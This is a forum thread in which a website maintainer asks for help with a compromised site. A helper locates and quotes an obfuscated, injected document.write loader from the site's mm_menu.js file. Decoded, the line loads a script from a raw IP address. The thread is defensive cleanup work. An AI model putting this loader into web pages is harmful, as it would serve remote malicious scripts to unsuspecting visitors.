Malware Related > Compromised Servers compromised

(1/2) > >>

Hi, I am a novice user that is having the malicious site blocked every time i access one website  I did a yahoo search on the and found this malware domain list and forum.  I don't know if you are the right person to post a reply to but I am really wanting to find out how to clean this off this website because i am the website updater and don't know why it is doing this.  Can you offer any help whatsoever?  I would be greatly indebted to you.

--- Quote from: MysteryFCM on April 07, 2009, 06:17:04 am ---I think you could be right :( ..... the following is the uncompressed output from the PDF;

--- End quote ---


MysteryFCM: Disabled link and removed code from quoted post. Split and moved to compromised servers forum

I've checked the site you referenced and cannot find anything suspicious. Is this the site you are having difficulty with?


Nevermind, found it. The code is at the bottom of mm_menu.js (disable this file or replace it with a clean copy);

--- Code: ---document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
--- End code ---

This decodes to;

--- Code: ---<script src=//></script>
--- End code ---

There's malware script on mm_menu.js

--- Code: ---<!--

--- End code ---

heh yep, updated my post whilst you were posting ....

Script is also present in;


[0] Message Index

[#] Next page

Go to full version